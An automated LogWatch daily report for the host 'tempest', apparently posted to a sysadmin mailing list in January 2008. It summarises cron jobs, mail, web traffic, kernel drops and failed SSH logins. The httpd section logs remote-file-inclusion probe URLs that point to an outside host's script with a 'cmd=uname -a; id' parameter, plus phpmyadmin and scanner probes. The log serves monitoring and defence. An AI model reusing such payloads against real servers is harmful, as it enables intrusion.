[Sysadmin] LogWatch for tempest
root
root at tempest.evolt.org
Wed Jan 23 06:25:22 CST 2008
################### LogWatch 5.2.2 (06/23/04) ####################
Processing Initiated: Wed Jan 23 06:25:13 2008
Date Range Processed: yesterday
Detail Level of Output: 10
Logfiles for Host: tempest
################################################################
--------------------- Cron Begin ------------------------
Commands Run:
User dkaufman:
/bin/date > $HOME/date.txt: 1440 Time(s)
User dmah:
/home/dmah/bin/article_reminder.pl: 1 Time(s)
/home/dmah/bin/comment_reminder.pl: 1 Time(s)
User mailman:
/home/mailman/bin/discardbysubj.pl: 24 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/checkdbs: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/disabled: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/gate_news: 288 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/nightly_gzip: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/senddigests: 1 Time(s)
User root:
run-parts --report /etc/cron.hourly: 24 Time(s)
[ -d /var/lib/php4 ] && find /var/lib/php4/ -type f -cmin +$(/usr/lib/php4/maxlifetime) -print0 | xargs -r -0 rm: 48 Time(s)
/store/host/browsers.evolt.org/mkarchivesize: 1 Time(s)
/usr/bin/freshclam --quiet -l /var/log/clam-update.log: 1 Time(s)
/usr/local/bin/planetupdate 1>/dev/null 2>&1: 24 Time(s)
/usr/sbin/ntpdate -su us.pool.ntp.org us.pool.ntp.org: 1 Time(s)
/var/qmail/bin/qmailstats 1>/dev/null 2>/dev/null: 1 Time(s)
if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi: 288 Time(s)
test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily: 1 Time(s)
test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt: 1 Time(s)
wget -O - -q http://evolt.org/cron.php: 72 Time(s)
User www-data:
[ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache/access.log ] && /usr/lib/cgi-bin/awstats.pl -config=awstats -update >/dev/null: 144 Time(s)
---------------------- Cron End -------------------------
--------------------- EXIM Begin ------------------------
--- Messages history ---
-MsgID: 1JHIBt-0005iG-00:
2008-01-22 06:25:21 <= root at tempest.evolt.org U=root P=local S=18085
2008-01-22 06:28:31 lists.evolt.org [67.19.100.195]: Connection timed out
2008-01-22 06:28:31 == sysadmin at lists.evolt.org T=local_smtp defer (110): Connection timed out
2008-01-22 06:28:31 failed to open DB file /var/spool/exim/db/retry: File exists
-MsgID: 1JHLv5-000502-00:
2008-01-22 10:28:03 <= root at tempest.evolt.org U=root P=local S=1008
2008-01-22 10:31:13 lists.evolt.org [67.19.100.195]: Connection timed out
2008-01-22 10:31:13 == root at lists.evolt.org <root at tempest.evolt.org> T=local_smtp defer (110): Connection timed out
2008-01-22 10:31:13 failed to open DB file /var/spool/exim/db/retry: File exists
26 messages delivered immediately to 26 total recipients
---------------------- EXIM End -------------------------
--------------------- httpd Begin ------------------------
0.79 MB transfered in 695 responses (1xx 0, 2xx 73, 3xx 12, 4xx 610, 5xx 0)
88 Images (0.03 MB),
9 Documents (0.00 MB),
4 Archives (0.00 MB),
457 Content pages (0.52 MB),
17 Program source files (0.13 MB),
120 Other (0.12 MB)
Attempts to use 1 known hacks were logged 159 time(s)
phpmyadmin by
208.64.36.88 159 time(s)
A total of 1 sites probed the server
208.64.36.88
A total of 48 unidentified 'other' records logged
GET /turkif HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolters?annotate=1.6 HTTP/1.0 with response code(s) 1 200 responses
GET /stone HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/Attic/evolt.ico?view=graph HTTP/1.1 with response code(s) 1 200 responses
GET /these-things-i-know-php-tips\" class=http://www.webzenxd.kit.net/tool25.txt?&cmd=uname%20-a;%20id HTTP/1.1 with response code(s) 3 400 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/dns/org.evolters?rev=1.6 HTTP/1.1 with response code(s) 1 200 responses
GET /djc/temp/CREDITS HTTP/1.0 with response code(s) 1 404 responses
GET /luminosity? HTTP/1.0 with response code(s) 1 404 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/49 HTTP/1.1 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.1 with response code(s) 5 404 responses
GET /webdad/testing/day_scheduler.html, HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi HTTP/1.0 with response code(s) 1 404 responses
GET /jswiders HTTP/1.1 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=1.15 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evoltorg.psd?view=log&only_with_tag=HEAD&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /StOne HTTP/1.0 with response code(s) 1 404 responses
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 with response code(s) 3 400 responses
GET /jeff/code/input_value.cfm?sub=1 HTTP/1.1 with response code(s) 1 404 responses
GET /kristyfrey HTTP/1.0 with response code(s) 1 404 responses
GET /seb HTTP/1.1 with response code(s) 1 404 responses
GET /Isaac HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi/traffic.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /dshadovi HTTP/1.1 with response code(s) 1 404 responses
GET /jswiders HTTP/1.0 with response code(s) 2 404 responses
GET /jeff/code/preload_n_rollover HTTP/1.0 with response code(s) 3 404 responses
GET /matthewo HTTP/1.0 with response code(s) 1 404 responses
GET /tos.cfm HTTP/1.0 with response code(s) 1 404 responses
- with response code(s) 36 408 responses
GET /garrett/site/books/factual HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/js_url_variables/index.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /mantruc/blog HTTP/1.1 with response code(s) 3 404 responses
GET /jeff/code/preload_n_rollover HTTP/1.1 with response code(s) 3 404 responses
GET /jeff/code/unchecking_radio_buttons.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /php-login-system-with-admin-features\" class=http://www.webzenxd.kit.net/tool25.txt?&cmd=uname%20-a;%20id HTTP/1.1 with response code(s) 3 400 responses
GET /shaggy/windows/user, HTTP/1.1 with response code(s) 1 404 responses
GET /members.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/imagemap_rollover/index.cfm HTTP/1.1 with response code(s) 2 404 responses
GET /mpember/afroapix/website/index.php'. HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=1.5 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evoltorg.psd?view=log&only_with_tag=MAIN&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /dshadovi/MM_resources.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/checkbox_check_all.cfm HTTP/1.1 with response code(s) 2 404 responses
GET /dshadovi/cftree/cftree_event.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /garrett/site/books/factual HTTP/1.1 with response code(s) 4 404 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/66 HTTP/1.0 with response code(s) 1 404 responses
GET /f%3Cspan%20class= HTTP/1.1 with response code(s) 1 404 responses
A total of 12 ROBOTS were logged
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) 7 time(s)
WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU) 2 time(s)
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 3 time(s)
<b> Runnk RSS finder: http://www.runnk.com/il/law : Israeli legal : Mishpat : עורכי דין : חוק ומשפט </b> (hybridwse at runnk.com) 3 time(s)
ia_archiver-web.archive.org 1 time(s)
msnbot/1.0 (+http://search.msn.com/msnbot.htm) 15 time(s)
Yeti/0.01 (nhn/1noon, yetibot at naver.com, check robots.txt daily and follow it) 5 time(s)
VadixBot 1 time(s)
Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) 1 time(s)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/) 4 time(s)
msnbot-media/1.0 (+http://search.msn.com/msnbot.htm) 4 time(s)
Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp) 1 time(s)
---------------------- httpd End -------------------------
--------------------- Kernel Begin ------------------------
2 Time(s): NET: 10 messages suppressed.
1 Time(s): NET: 12 messages suppressed.
1 Time(s): NET: 13 messages suppressed.
1 Time(s): NET: 18 messages suppressed.
1 Time(s): NET: 21 messages suppressed.
1 Time(s): NET: 23 messages suppressed.
1 Time(s): NET: 28 messages suppressed.
1 Time(s): NET: 3 messages suppressed.
1 Time(s): NET: 34 messages suppressed.
1 Time(s): NET: 41 messages suppressed.
1 Time(s): NET: 46 messages suppressed.
1 Time(s): NET: 5 messages suppressed.
1 Time(s): NET: 9 messages suppressed.
1 Time(s): TCP: drop open request from 208.98.47.226/15012
1 Time(s): TCP: drop open request from 208.98.47.226/19985
1 Time(s): TCP: drop open request from 208.98.47.226/20085
1 Time(s): TCP: drop open request from 208.98.47.226/21947
1 Time(s): TCP: drop open request from 208.98.47.226/28471
1 Time(s): TCP: drop open request from 208.98.47.226/29592
1 Time(s): TCP: drop open request from 208.98.47.226/33446
1 Time(s): TCP: drop open request from 208.98.47.226/36292
1 Time(s): TCP: drop open request from 208.98.47.226/37752
1 Time(s): TCP: drop open request from 208.98.47.226/39974
1 Time(s): TCP: drop open request from 208.98.47.226/44208
1 Time(s): TCP: drop open request from 208.98.47.226/45137
1 Time(s): TCP: drop open request from 208.98.47.226/51028
1 Time(s): TCP: drop open request from 208.98.47.226/54225
1 Time(s): TCP: drop open request from 208.98.47.226/59813
1 Time(s): TCP: drop open request from 208.98.47.226/61977
1 Time(s): TCP: drop open request from 208.98.47.226/8418
1 Time(s): TCP: drop open request from 208.98.47.226/9931
1 Time(s): TCP: drop open request from 208.98.47.227/18043
1 Time(s): TCP: drop open request from 208.98.47.227/34202
1 Time(s): TCP: drop open request from 208.98.47.227/39478
1 Time(s): TCP: drop open request from 208.98.47.227/40383
1 Time(s): TCP: drop open request from 208.98.47.227/4489
1 Time(s): TCP: drop open request from 208.98.47.227/47686
1 Time(s): TCP: drop open request from 208.98.47.227/51931
1 Time(s): TCP: drop open request from 208.98.47.227/8712
1 Time(s): TCP: drop open request from 61.247.217.36/47401
1 Time(s): TCP: drop open request from 64.157.224.151/4679
1 Time(s): TCP: drop open request from 65.54.165.39/37609
1 Time(s): TCP: drop open request from 66.249.70.131/47617
1 Time(s): TCP: drop open request from 66.252.17.242/12967
1 Time(s): TCP: drop open request from 66.252.17.242/20412
1 Time(s): TCP: drop open request from 66.252.17.242/22425
1 Time(s): TCP: drop open request from 66.252.17.242/54482
1 Time(s): TCP: drop open request from 66.252.17.242/55031
1 Time(s): TCP: drop open request from 66.252.17.242/58939
1 Time(s): TCP: drop open request from 66.252.17.242/59444
1 Time(s): TCP: drop open request from 66.252.17.242/60874
1 Time(s): TCP: drop open request from 66.252.17.242/828
1 Time(s): TCP: drop open request from 66.252.17.242/8613
1 Time(s): TCP: drop open request from 74.6.19.102/44861
1 Time(s): TCP: drop open request from 76.17.220.55/2156
1 Time(s): TCP: drop open request from 83.237.51.251/2971
1 Time(s): TCP: drop open request from 86.107.130.2/15861
1 Time(s): TCP: drop open request from 86.107.130.2/27810
1 Time(s): TCP: drop open request from 86.107.130.2/27835
1 Time(s): TCP: drop open request from 86.107.130.2/31617
1 Time(s): TCP: drop open request from 86.107.130.2/41795
1 Time(s): TCP: drop open request from 86.107.130.2/47274
1 Time(s): TCP: drop open request from 86.107.130.2/48275
1 Time(s): TCP: drop open request from 86.107.130.2/48611
1 Time(s): TCP: drop open request from 86.107.130.2/5226
1 Time(s): TCP: drop open request from 86.107.130.2/64052
1 Time(s): TCP: drop open request from 86.107.130.2/7956
1 Time(s): TCP: drop open request from 86.107.130.2/8267
1 Time(s): TCP: drop open request from 86.107.131.91/14600
1 Time(s): TCP: drop open request from 86.107.131.91/16723
1 Time(s): TCP: drop open request from 86.107.131.91/20079
1 Time(s): TCP: drop open request from 86.107.131.91/20143
1 Time(s): TCP: drop open request from 86.107.131.91/22262
1 Time(s): TCP: drop open request from 86.107.131.91/22592
1 Time(s): TCP: drop open request from 86.107.131.91/23300
1 Time(s): TCP: drop open request from 86.107.131.91/24442
1 Time(s): TCP: drop open request from 86.107.131.91/26862
1 Time(s): TCP: drop open request from 86.107.131.91/28057
1 Time(s): TCP: drop open request from 86.107.131.91/29748
1 Time(s): TCP: drop open request from 86.107.131.91/31426
1 Time(s): TCP: drop open request from 86.107.131.91/3415
1 Time(s): TCP: drop open request from 86.107.131.91/36287
1 Time(s): TCP: drop open request from 86.107.131.91/36377
1 Time(s): TCP: drop open request from 86.107.131.91/38091
1 Time(s): TCP: drop open request from 86.107.131.91/39782
1 Time(s): TCP: drop open request from 86.107.131.91/42544
1 Time(s): TCP: drop open request from 86.107.131.91/44460
1 Time(s): TCP: drop open request from 86.107.131.91/44592
1 Time(s): TCP: drop open request from 86.107.131.91/44679
1 Time(s): TCP: drop open request from 86.107.131.91/49771
1 Time(s): TCP: drop open request from 86.107.131.91/5570
1 Time(s): TCP: drop open request from 86.107.131.91/55877
1 Time(s): TCP: drop open request from 86.107.131.91/60506
1 Time(s): TCP: drop open request from 86.107.131.91/61346
1 Time(s): TCP: drop open request from 86.107.131.91/61746
1 Time(s): TCP: drop open request from 86.107.131.91/63356
1 Time(s): TCP: drop open request from 86.107.131.91/7377
1 Time(s): TCP: drop open request from 86.107.131.91/8735
1 Time(s): TCP: drop open request from 86.107.131.91/8737
1 Time(s): UDP: short packet: 12.96.160.115:53 123/107 to 67.19.100.194:44197
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:44911
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:60458
1 Time(s): UDP: short packet: 12.96.160.115:53 184/168 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:37231
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:57672
1 Time(s): UDP: short packet: 12.96.160.115:53 221/205 to 67.19.100.194:50414
1 Time(s): UDP: short packet: 12.96.160.115:53 276/260 to 67.19.100.194:48840
1 Time(s): UDP: short packet: 12.96.160.115:53 281/265 to 67.19.100.194:40145
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:34069
1 Time(s): UDP: short packet: 12.96.160.115:53 505/489 to 67.19.100.194:59965
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:40268
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:45752
1 Time(s): device eth0 entered promiscuous mode
1 Time(s): device eth0 left promiscuous mode
4 Time(s): sending pkt_too_big (len[1500] pmtu[1496]) to self
---------------------- Kernel End -------------------------
--------------------- pam_unix Begin ------------------------
cron:
Sessions Opened:
dkaufman: 1440 Time(s)
root: 462 Time(s)
mailman: 316 Time(s)
www-data: 144 Time(s)
dmah: 2 Time(s)
sshd:
Authentication Failures:
unknown (rubisco.ugr.es): 4 Time(s)
Invalid Users:
Unknown Account: 4 Time(s)
su:
Sessions Opened:
(uid=0) -> nobody: 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
perl: gethostby*.getanswer: asked for "2.70.152.198.in-addr.arpa IN PTR", got type "39"
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail Begin ------------------------
ERROR: Could not open /etc/mail/local-host-names
ERROR: Could not open /etc/mail/access
Message Size Distribution:
Range # Msgs KBytes
0 - 10k 0 0
10k - 20k 0 0
20k - 50k 0 0
50k - 100k 0 0
100k - 500k 0 0
500k - 1Mb 0 0
1Mb - 2Mb 0 0
2Mb - 5Mb 0 0
5Mb - 10Mb 0 0
10Mb+ 0 0
----------------------------------
TOTAL 0 0
---------------------- sendmail End -------------------------
--------------------- SSHD Begin ------------------------
Didn't receive an ident from these IPs:
24-176-255-158.static.reno.nv.charter.com (24.176.255.158): 5 Time(s)
Failed logins from these:
andrea/keyboard-interactive/pam from 150.214.60.61: 4 Time(s)
Illegal users from these:
andrea/keyboard-interactive/pam from 150.214.60.61: 4 Time(s)
andrea/none from 150.214.60.61: 4 Time(s)
Error in PAM authentication:
User not known to the underlying authentication module for illegal user andrea from rubisco.ugr.es : 4 Time(s)
---------------------- SSHD End -------------------------
--------------------- Syslogd Begin ------------------------
Syslogd started 1 Time(s)
---------------------- Syslogd End -------------------------
------------------ Disk Space --------------------
/dev/hda3 72G 24G 44G 36% /
/dev/hda1 92M 6.3M 81M 8% /boot
###################### LogWatch End #########################
More information about the Sysadmin
mailing list